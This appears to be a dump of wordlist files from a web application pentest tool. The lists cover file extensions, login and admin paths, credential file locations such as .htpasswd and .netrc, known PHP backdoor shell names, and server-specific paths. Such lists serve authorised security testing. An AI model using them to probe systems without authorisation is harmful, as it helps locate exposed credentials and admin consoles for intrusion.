| cpt 37 | dar 38 | dd 39 | deb 40 | dgc 41 | dist 42 | ecs 43 | efw 44 | epi 45 | f 46 | fdp 47 | gca 48 | gz 49 | gzi 50 | gzip 51 | ha 52 | hbc 53 | hbc2 54 | hbe 55 | hki 56 | hki1 57 | hki2 58 | hki3 59 | hpk 60 | hyp 61 | ice 62 | ipg 63 | ipk 64 | ish 65 | j 66 | jar.pack 67 | jgz 68 | jic 69 | kgb 70 | lbr 71 | lemon 72 | lha 73 | lnx 74 | lqr 75 | lz 76 | lzh 77 | lzm 78 | lzma 79 | lzo 80 | lzx 81 | md 82 | mint 83 | mou 84 | mpkg 85 | mzp 86 | oar 87 | p7m 88 | packgz 89 | package 90 | pae 91 | pak 92 | paq6 93 | paq7 94 | paq8 95 | par 96 | par2 97 | pbi 98 | pcv 99 | pea 100 | pet 101 | pf 102 | pim 103 | pit 104 | piz 105 | pkg 106 | pup 107 | puz 108 | pwa 109 | qda 110 | r0 111 | r00 112 | r01 113 | r02 114 | r03 115 | r1 116 | r2 117 | r30 118 | rar 119 | rev 120 | rk 121 | rnc 122 | rp9 123 | rpm 124 | rte 125 | rz 126 | rzs 127 | s00 128 | s01 129 | s02 130 | s7z 131 | sar 132 | sdc 133 | sdn 134 | sea 135 | sen 136 | sfs 137 | sfx 138 | sh 139 | shar 140 | shk 141 | shr 142 | sit 143 | sitx 144 | spt 145 | sqx 146 | sqz 147 | tar 148 | targz 149 | tarxz 150 | taz 151 | tbz 152 | tbz2 153 | tg 154 | tgz 155 | tlz 156 | tlzma 157 | txz 158 | tz 159 | uc2 160 | uha 161 | vem 162 | vsi 163 | wad 164 | war 165 | wot 166 | xef 167 | xez 168 | xmcdz 169 | xpi 170 | xx 171 | xz 172 | y 173 | yz 174 | z 175 | z01 176 | z02 177 | z03 178 | z04 179 | zap 180 | zfsendtotarget 181 | zip 182 | zipx 183 | zix 184 | zoo 185 | zpi 186 | zz 187 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Mostcommon.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | php 4 | php3 5 | php4 6 | php5 7 | txt 8 | shtm 9 | shtml 10 | phtm 11 | phtml 12 | jhtml 13 | pl 14 | jsp 15 | cfm 16 | cfml 17 | py 18 | rb 19 | cfg 20 | zip 21 | pdf 22 | gz 23 | tar 24 | tar.gz 25 | tgz 26 | doc 27 | docx 28 | xls 29 | xlsx 30 | conf 31 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Skipfish.txt: -------------------------------------------------------------------------------- 1 | 7z 2 | asmx 3 | asp 4 | aspx 5 | bak 6 | bat 7 | bin 8 | bz2 9 | c 10 | cc 11 | cfg 12 | cfm 13 | cgi 14 | class 15 | cnf 16 | conf 17 | config 18 | cpp 19 | cs 20 | csv 21 | dat 22 | db 23 | dll 24 | do 25 | doc 26 | dump 27 | ep 28 | err 29 | error 30 | exe 31 | gif 32 | gz 33 | htm 34 | html 35 | inc 36 | ini 37 | java 38 | jhtml 39 | jpg 40 | js 41 | jsf 42 | jsp 43 | key 44 | lib 45 | log 46 | lst 47 | manifest 48 | mdb 49 | meta 50 | msg 51 | nsf 52 | o 53 | old 54 | ora 55 | orig 56 | out 57 | part 58 | pdf 59 | php 60 | php3 61 | phtml 62 | pl 63 | pm 64 | png 65 | ppt 66 | properties 67 | py 68 | rar 69 | rss 70 | rtf 71 | save 72 | sh 73 | shtml 74 | so 75 | sql 76 | stackdump 77 | swf 78 | tar 79 | tar.bz2 80 | tar.gz 81 | temp 82 | test 83 | tgz 84 | tmp 85 | trace 86 | txt 87 | vb 88 | vbs 89 | ws 90 | xls 91 | xml 92 | xsl 93 | zip 94 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/copy_of.txt: -------------------------------------------------------------------------------- 1 | Copy_(1)_of_ 2 | Copy_(2)_of_ 3 | Copy%20of%20 4 | Copy_of_ 5 | Copy_ 6 | Copy%20 7 | _ 8 | %20 9 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/test_demo.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | eval 35 | Eval 36 | EVAL 37 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/filename-dirname-bruteforce/upload_variants.txt: -------------------------------------------------------------------------------- 1 | up 2 | upload 3 | uploads 4 | uploaded 5 | upfiles 6 | uploadfiles 7 | uploads 8 | fileupload 9 | uploadedfiles 10 | uploaded_files 11 | upload_files 12 | upload_content 13 | uploaded_content 14 | uploadcontent 15 | uploadedcontent 16 | uploadcertificates 17 | uploaddocuments 18 | upload_certificates 19 | upload_documents 20 | upload_images 21 | uploadimages 22 | uploadedimages 23 | uploaded_images 24 | uploaded_documents 25 | uploaded_certificates 26 | upload_test 27 | uploadtest 28 | uploadrequests 29 | upload_report 30 | uploadreport 31 | uploadreports 32 | upload_reports 33 | upload_requests 34 | uploadedreports 35 | uploaded_requests 36 | uploaded_reporst 37 | uploadedrequests 38 | upload_temp 39 | upload_tmp 40 | uploadtmp 41 | uploadtemp 42 | upload2 43 | upload3 44 | upload4 45 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/login-file-locations/Logins.txt: -------------------------------------------------------------------------------- 1 | /admin 2 | /Admin 3 | /admin.asp 4 | /admin.aspx 5 | /admin.cfm 6 | /admin.jsp 7 | /admin.php 8 | /Admin.php 9 | /admin.php4 10 | /admin.pl 11 | /Admin.pl 12 | /admin.py 13 | /admin.rb 14 | /administrator 15 | /Administrator 16 | /administrator.asp 17 | /administrator.aspx 18 | /administrator.cfm 19 | /administrator.jsp 20 | /administrator.php 21 | /Administrator.php 22 | /administrator.php4 23 | /administrator.pl 24 | /administrator.py 25 | /Administrator.py 26 | /administrator.rb 27 | /admnistrator.php3 28 | /cgi-bin/sqwebmail?noframes=1 29 | /default.asp 30 | /exchange/logon.asp 31 | /gs/admin 32 | /index.php?u= 33 | /login 34 | /Login 35 | /login.asp 36 | /login.aspx 37 | /login.cfm 38 | /login.php 39 | /Login.php 40 | /login.php3 41 | /login.php4 42 | /login.pl 43 | /Login.pl 44 | /login.py 45 | /login.rb 46 | /logon 47 | /Logon 48 | /logon.asp 49 | /logon.aspx 50 | /logon.jsp 51 | /logon.php 52 | /Logon.php 53 | /logon.php3 54 | /logon.php4 55 | /logon.pl 56 | /Logon.pl 57 | /logon.py 58 | /logon.rb 59 | /typo3/in 60 | /utilities/TreeView.asp 61 | /webeditor.php 62 | /exchange/logon.asp 63 | /names.nsf?OpenDatabase 64 | /Citrix/NFuse17/ 65 | /citrix/metaframe/default/ 66 | /Citrix/MetaFrameXP/ 67 | /phpmyadmin 68 | /InfoViewApp/logon.jsp 69 | /dana-na/auth/url_default/welcome.cgi 70 | /src/login.php 71 | 72 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/password-file-locations/Passwords.txt: -------------------------------------------------------------------------------- 1 | /secring.skr 2 | /secring.pgp 3 | /secring.bak 4 | /passwd 5 | /passwd.bak 6 | /master.passwd 7 | /pwd.db 8 | /htpasswd 9 | /htpasswd.bak 10 | /htgroup 11 | /spwd.db 12 | /htpasswd/htpasswd.bak 13 | /config.php 14 | /phpinfo.php 15 | /passlist 16 | /passlist.txt 17 | /auth_user_file 18 | /administrators.pwd 19 | /admin.mdb 20 | /connect.inc 21 | /globals.inc 22 | /vtund.conf 23 | /password.log 24 | /slapd.conf 25 | /wvdial.conf 26 | /.netrc 27 | /wand.dat 28 | /mrtg.cfg 29 | /zebra.conf 30 | /ospfd.conf 31 | /ccbill.log 32 | /users.mdb 33 | /lilo.conf 34 | /wwwboard/passwd.txt 35 | /db/main.mdb 36 | /sites.ini 37 | /wcx_ftp.ini 38 | /ws_ftp.ini 39 | /flashFXP.ini 40 | /serv-u.ini 41 | /eudora.ini 42 | /unattend.txt 43 | /passwd.txt 44 | /server.cfg 45 | /pass.dat 46 | /phpinfo.php 47 | /admin.dat 48 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/php/PHP.txt: -------------------------------------------------------------------------------- 1 | /phpinfo.php 2 | /test.php 3 | /test1.php 4 | /test2.php 5 | /_index.php 6 | /__index.php 7 | /index.php~ 8 | /index.php-bak 9 | /index-bak 10 | /index.php.bak 11 | /info.php 12 | /phpsecinfo 13 | /php.ini 14 | /php.ini~ 15 | /php 16 | /phpsecinfo 17 | /phpinfo 18 | /phpmyadmin/ 19 | /phpMyAdmin/ 20 | /mysqladmin/ 21 | /MySQLadmin 22 | /MySQLAdmin 23 | /login.php 24 | /logon.php 25 | /xmlrpc.php 26 | /dbadmin 27 | /PMA 28 | /application/configs/application.ini 29 | /awstats 30 | /myadmin -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/php/PHP_CommonBackdoors.txt: -------------------------------------------------------------------------------- 1 | c99.php 2 | c99shell.php 3 | r57.php 4 | r58.php 5 | dra.php 6 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/proxy-conf.txt: -------------------------------------------------------------------------------- 1 | /pac/ 2 | /proxy/ 3 | /.pac/ 4 | /managers/ 5 | /admin/ 6 | /employees/ 7 | /users/ 8 | /proxy/pac/ 9 | .pac 10 | proxy.pac 11 | /.pac/.pac 12 | /.pac/proxy.pac 13 | /proxy/.pac 14 | /proxy/proxy.pac 15 | /pac/.pac 16 | /pac/proxy.pac 17 | /managers/.pac 18 | /managers/proxy.pac 19 | /admin/.pac 20 | /admin/proxy.pac 21 | /employees/.pac 22 | /employees/proxy.pac 23 | /users/.pac 24 | /users/proxy.pac 25 | /proxy/pac/proxy.pac 26 | /proxy/pac/.pac 27 | users.pac 28 | admin.pac 29 | managers.pac 30 | employees.pac 31 | guest.pac 32 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/tftp.txt: -------------------------------------------------------------------------------- 1 | # files commonly transmitted via tftp 2 | 000000000000.cfg 3 | 000000000000-directory~.xml 4 | 323tosip1_1.bin 5 | 4601_02_readme_R2_3.txt 6 | 4601dbte1_82.bin 7 | 4602_02SWSIPreadme_R1_1.txt 8 | 4602dbte1_82.bin 9 | 4602sbte1_82.bin 10 | 4610_20_readme_R2_3.txt 11 | 4610_20_readme_SIP_R2_2.txt 12 | 4624_12_06readme_1_8_3.txt 13 | 4625_readme_2_5.txt 14 | 4690_010707.bin 15 | 4690_readme_1_7_7.txt 16 | 46xxreadme_111405.txt 17 | 46xxsettings.txt 18 | 46xxupgrade.scr 19 | a01d01b2_3.bin 20 | a02d01b2_3.bin 21 | a10d01b2_3.bin 22 | a20d01a2_3.bin 23 | a20d01b2_3.bin 24 | a25d01a2_5.bin 25 | b01d01b2_3.bin 26 | b02d01b2_3.bin 27 | b10d01b2_3.bin 28 | b20d01a2_3.bin 29 | b20d01b2_3.bin 30 | b25d01a2_5.bin 31 | bbla0_83.bin 32 | bootrom.ld 33 | cisco_util 34 | CP7912010301SIP050608A.sbin 35 | cvt01_2_3.bin 36 | cvt02_2_3.bin 37 | cvt02sw_2_3.bin 38 | def06r1_8_3.bin 39 | def24r1_8_3.bin 40 | dialplan.xml 41 | gkdefault.cfg 42 | infrared.txt 43 | merlin2.pcm 44 | OS79XX.TXT 45 | P003-07-5-00.bin 46 | P003-07-5-00.sbn 47 | P0S3-07-5-00.bin 48 | P0S3-07-5-00.loads 49 | P0S3-07-5-00.sb2 50 | phbook00e011010455.txt 51 | phone1.cfg 52 | release.xml 53 | RINGLIST.DAT 54 | s10d01b2_2.bin 55 | s20d01b2_2.bin 56 | SEP000F34118045.cnf 57 | SEP001562EA69E8.cnf 58 | SEPDefault.cnf 59 | SIP000F34118045.cnf 60 | SIPinsertMAChere.cnf 61 | SIPinsertMAChere.cnf 62 | sip_4602ap1_1.ebin 63 | sip_4602bt1_1.ebin 64 | sip_4602D01A.txt 65 | sip_4602D02A.txt 66 | sip.cfg 67 | SIPDefault.cnf 68 | sip.ld 69 | sipto323_1_1.ebin 70 | sip.ver 71 | SoundPointIPLocalization 72 | SoundPointIPWelcome.wav 73 | syncinfo.xml 74 | test 75 | test.txt 76 | uip200_463enc.pac 77 | uniden00e011030397.txt 78 | unidencom.txt 79 | XMLDefault.cnf.xml 80 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/AdobeXML.txt: -------------------------------------------------------------------------------- 1 | /flex2gateway/ 2 | /flex2gateway/http 3 | /flex2gateway/httpsecure 4 | /flex2gateway/cfamfpoolling 5 | /flex2gateway/amf 6 | /flex2gateway/amfpolling 7 | /messagebroker/http 8 | /messagebroker/httpsecure 9 | /blazeds/messagebroker/http 10 | /blazeds/messagebroker/httpsecure 11 | /samples/messagebroker/http 12 | /samples/messagebroker/httpsecure 13 | /lcds/messagebroker/http 14 | /lcds/messagebroker/httpsecure 15 | /lcds-samples/messagebroker/http 16 | /lcds-samples/messagebroker/httpsecure 17 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Apache.txt: -------------------------------------------------------------------------------- 1 | /.htaccess 2 | /.htaccess.bak 3 | /.htpasswd 4 | /.meta 5 | /.web 6 | /apache/logs/access.log 7 | /apache/logs/access_log 8 | /apache/logs/error.log 9 | /apache/logs/error_log 10 | /httpd/logs/access.log 11 | /httpd/logs/access_log 12 | /httpd/logs/error.log 13 | /httpd/logs/error_log 14 | /logs/access.log 15 | /logs/access.log 16 | /logs/error.log 17 | /logs/error_log 18 | /access_log 19 | /cgi 20 | /cgi-bin 21 | /cgi-pub 22 | /cgi-script 23 | /dummy 24 | /error 25 | /error_log 26 | /htdocs 27 | /httpd 28 | /httpd.pid 29 | /icons 30 | /index.html 31 | /logs 32 | /manual 33 | /phf 34 | /printenv 35 | /server-info 36 | /server-status 37 | /status 38 | /test-cgi 39 | /tmp 40 | /~bin 41 | /~ftp 42 | /~nobody 43 | /~root 44 | /~toor 45 | /~daemon 46 | /~adm 47 | /~lp 48 | /~sync 49 | /~shutdown 50 | /~halt 51 | /~mail 52 | /~pop 53 | /~postmaster 54 | /~news 55 | /~uucp 56 | /~operator 57 | /~games 58 | /~gopher 59 | /~nscd 60 | /~mailnull 61 | /~ident 62 | /~rpc 63 | /~rpcuser 64 | /~xfs 65 | /~gdm 66 | /~apache 67 | /~http 68 | /~web 69 | /~www 70 | /~adm 71 | /~admin 72 | /~administrator 73 | /~guest 74 | /~firewall 75 | /~fwuser 76 | /~fwadmin 77 | /~fw 78 | /~test 79 | /~testuser 80 | /~user 81 | /~user1 82 | /~user2 83 | /~user3 84 | /~user4 85 | /~user5 86 | /~sql 87 | /~data 88 | /~database 89 | /~db 90 | /~anonymous 91 | /~staff 92 | /~office 93 | /~help 94 | /~helpdesk 95 | /~reception 96 | /~system 97 | /~operator 98 | /~backup 99 | /~vagrant 100 | /~guest 101 | /~mysql 102 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/ApacheTomcat.txt: -------------------------------------------------------------------------------- 1 | /examples 2 | /examples/jsp/index.html 3 | /examples/jsp/snp/snoop.jsp 4 | /examples/jsp/source.jsp 5 | /examples/servlet/HelloWorldExample 6 | /examples/servlet/SnoopServlet 7 | /examples/servlet/TroubleShooter 8 | /examples/servlet/default/jsp/snp/snoop.jsp 9 | /examples/servlet/default/jsp/source.jsp 10 | /examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 17 | /examples/servlet/snoop 18 | /examples/servlets/index.html 19 | /jsp-examples 20 | /manager 21 | /manager/deploy?path=foo 22 | /manager/html/ 23 | /servlet/default/ 24 | /servlet/mstrWebAdmin 25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 27 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 28 | /servlet/org.apache.catalina.servlets.DefaultServlet/ 29 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 30 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet 31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 32 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 33 | /servlet/org.apache.catalina.servlets.ManagerServlet 34 | /servlet/org.apache.catalina.servlets.SnoopAllServlet 35 | /servlet/org.apache.catalina.servlets.WebdavServlet/ 36 | /tomcat-docs 37 | /webdav 38 | /webdav/index.html 39 | /webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 40 | /webdav/servlet/webdav/ 41 | /conf/ 42 | /conf/server.xml/ 43 | /WEB-INF/ 44 | /WEB-INF/web.xml 45 | /WEB-INF/classes/ 46 | /shared/ 47 | /shared/lib/ 48 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Apache_Axis.txt: -------------------------------------------------------------------------------- 1 | AdminServlet 2 | AxisServlet 3 | EchoHeaders.jws 4 | SOAPMonitor 5 | StockQuoteService.jws 6 | fingerprint.jsp 7 | happyaxis.jsp 8 | i18nLib.jsp 9 | index.html 10 | index.jsp 11 | index.jws 12 | services 13 | services/ 14 | servlet 15 | servlet/AdminServlet 16 | servlet/AxisServlet 17 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Frontpage.txt: -------------------------------------------------------------------------------- 1 | /admin.dll 2 | /admin.exe 3 | /administrators.pwd 4 | /author.dll 5 | /author.exe 6 | /author.log 7 | /authors.pwd 8 | /cgi-bin 9 | /default.htm 10 | /_fpclass 11 | /frontpg.ini 12 | /.htaccess 13 | /iisadmin 14 | /isadmin 15 | /logo.gif 16 | /_private 17 | /queryhit.htm 18 | /QUERYHIT.HTM 19 | /samples 20 | /search 21 | /Search 22 | /service.grp 23 | /service.pwd 24 | /shtml.exe 25 | /srchadm 26 | /users.pwd 27 | /_vti_adm 28 | /_vti_aut 29 | /_vti_bin 30 | /_vti_cnf 31 | /_vti_inf.html 32 | /vti_inf.html 33 | /_vti_log 34 | /_vti_pvt 35 | /_vti_txt 36 | /_vti_bin/_vti_aut/author.dll 37 | /_vti_bin/shtml.exe?_vti_rp 38 | 39 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/HTTP_POST_Microsoft.txt: -------------------------------------------------------------------------------- 1 | # Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb 2 | /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName 3 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/JBoss.txt: -------------------------------------------------------------------------------- 1 | /jmx-console 2 | /web-console 3 | /web-console/Invoker 4 | /invoker/JMXInvokerServlet 5 | /WEB-INF/jboss-web.xml 6 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/JRun.txt: -------------------------------------------------------------------------------- 1 | /compass/logon.jsp 2 | /databasenotes.html 3 | /flash/java/javabean/FlashJavaBean.html 4 | /jrunscripts 5 | /jstl-war/index.html 6 | /SmarTicketApp/index.html 7 | /techniques/servlets/index.html 8 | /travelnet/home.jsp 9 | /WEB-INF/webapp.properties 10 | /WEB-INF/web.xml 11 | /worldmusic/action/catalog 12 | /worldmusic/action/cdlist 13 | /ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/JavaServlets_Common.txt: -------------------------------------------------------------------------------- 1 | /DWREasyAjax/dwr/index.html 2 | /dwr/index.html 3 | /dwr/engine.js 4 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Netware.txt: -------------------------------------------------------------------------------- 1 | /ICHAINErrors 2 | /ICSLogin 3 | /ICHAINLogout 4 | /ICSIBroker 5 | /NetStorage 6 | /iManager 7 | /eMFrame 8 | /oneNet 9 | /ICHAIN 10 | /ICS 11 | /NSearch 12 | /SearchServlet 13 | /site 14 | /home.html 15 | /iFolder 16 | /update 17 | /webacc 18 | /nps 19 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Oracle9i.txt: -------------------------------------------------------------------------------- 1 | /CookieExample 2 | /Counter 3 | /DateServlet 4 | /HelloWorldServlet 5 | /RequestParamExample 6 | /SessionExample 7 | /SessionServlet 8 | /SimpleServlet 9 | /SnoopServlet 10 | /basic 11 | /cal 12 | /cgi-bin 13 | /echo 14 | /examples 15 | /fcgi-bin 16 | /hellouser 17 | /hellouser.jsp 18 | /j2ee 19 | /jsp 20 | /login.html 21 | /ojspdemos 22 | /perl 23 | /printenv 24 | /servlet 25 | /simple 26 | /snoop.jsp 27 | /snp 28 | /usebean.jsp 29 | /welcomeuser.jsp 30 | /pls 31 | /SIMPLEDAD 32 | /HTMLDB 33 | /ORASSO 34 | /SSODAD 35 | /PORTAL 36 | /PORTAL2 37 | /PORTAL30 38 | /PORTAL30_SSO 39 | /TEST 40 | /DAD 41 | /APP 42 | /ONLINE 43 | /DB 44 | /OWA 45 | /simpledad 46 | /htmldb 47 | /orasso 48 | /ssodad 49 | /portal 50 | /portal2 51 | /portal30 52 | /portal30_sso 53 | /test 54 | /dad 55 | /app 56 | /online 57 | /db 58 | /owa 59 | /null 60 | /pls/dad/null 61 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Ruby_Rails.txt: -------------------------------------------------------------------------------- 1 | .gitignore 2 | Gemfile 3 | README 4 | README.rdoc 5 | Rakefile 6 | app 7 | app/assets/images/rails.png 8 | app/assets/javascripts/application.js 9 | app/assets/stylesheets/application.css 10 | app/controllers 11 | app/controllers/admin_controller.rb 12 | app/controllers/application.rb 13 | app/controllers/application_controller.rb 14 | app/helpers/application_helper.rb 15 | app/mailers 16 | app/mailers/.gitkeep 17 | app/models 18 | app/models/.gitkeep 19 | app/views/layouts/application.html.erb 20 | config 21 | config.ru 22 | config/application.rb 23 | config/boot.rb 24 | config/database.yml 25 | config/deploy.rb 26 | config/environment.rb 27 | config/environments 28 | config/environments/development.rb 29 | config/environments/production.rb 30 | config/environments/test.rb 31 | config/initializers 32 | config/initializers/backtrace_silencers.rb 33 | config/initializers/inflections.rb 34 | config/initializers/mime_types.rb 35 | config/initializers/secret_token.rb 36 | config/initializers/session_store.rb 37 | config/initializers/wrap_parameters.rb 38 | config/locales 39 | config/locales/en.yml 40 | config/routes.rb 41 | core 42 | create 43 | db 44 | db/seeds.rb 45 | dispatch.cgi 46 | dispatch.fcgi 47 | dispatch.rb 48 | doc 49 | doc/README_FOR_APP 50 | lib 51 | lib/assets 52 | lib/assets/.gitkeep 53 | lib/tasks 54 | lib/tasks/.gitkeep 55 | log 56 | log/.gitkeep 57 | log/development.log 58 | log/production.log 59 | log/server.log 60 | log/test.log 61 | public 62 | public/404.html 63 | public/422.html 64 | public/500.html 65 | public/favicon.ico 66 | public/index.html 67 | public/robots.txt 68 | rails 69 | rails/info 70 | rails/info/properties 71 | script 72 | script/about 73 | script/console 74 | script/dbconsole 75 | script/destroy 76 | script/generate 77 | script/performance 78 | script/performance/benchmarker 79 | script/performance/profiler 80 | script/performance/request 81 | script/plugin 82 | script/process 83 | script/process/inspector 84 | script/process/reaper 85 | script/process/spawner 86 | script/rails 87 | script/runner 88 | script/server 89 | stdlib 90 | test/fixtures 91 | test/fixtures/.gitkeep 92 | test/functional 93 | test/functional/.gitkeep 94 | test/integration 95 | test/integration/.gitkeep 96 | test/performance/browsing_test.rb 97 | test/test_helper.rb 98 | test/unit 99 | test/unit/.gitkeep 100 | tmp/cache 101 | tmp/cache/assets 102 | vendor/assets/javascripts 103 | vendor/assets/javascripts/.gitkeep 104 | vendor/assets/stylesheets 105 | vendor/assets/stylesheets/.gitkeep 106 | vendor/plugins 107 | vendor/plugins/.gitkeep 108 | app/views/home/index.html.erb 109 | assets/application.css 110 | assets/jquery.js 111 | assets/application.js 112 | assets/home.css 113 | assets/home.js 114 | posts 115 | posts/new 116 | posts/1/edit 117 | posts.json 118 | javascripts/application.js 119 | javascripts/prototype.js 120 | stylesheets/application.css 121 | images/rails.png 122 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/SiteMinder.txt: -------------------------------------------------------------------------------- 1 | /iam/ 2 | /iam/siteminder/ 3 | /sitemindermonitor/ 4 | /sitemindermonitor/doConfig.jsp 5 | /sitemindermonitor/doSave.jsp 6 | /sitemindermonitor/readfile.jsp 7 | /siteminder/ 8 | /siteminder/monitor/ 9 | /siteminder/monitor/settings 10 | /doConfig.jsp 11 | /doSave.jsp 12 | /readfile.jsp 13 | /siteminderagent/ 14 | /siteminderagent/pwcgi/ 15 | /siteminderagent/pwcgi/smpwservicescgi.exe 16 | /auth/ 17 | /servlet/ 18 | /servlet/DateServlet 19 | /servlet/TestServlet 20 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/SunAppServerGlassfish.txt: -------------------------------------------------------------------------------- 1 | /BasicAuthServlet 2 | /CertAuthServlet 3 | /cgi-bin 4 | /cgi-bin/gx.cgi 5 | /cgi-bin/gx.dll 6 | /cgi-bin/gx.exe 7 | /classes 8 | /com.netscape.server.servlet.jsp.JSPRunner 9 | 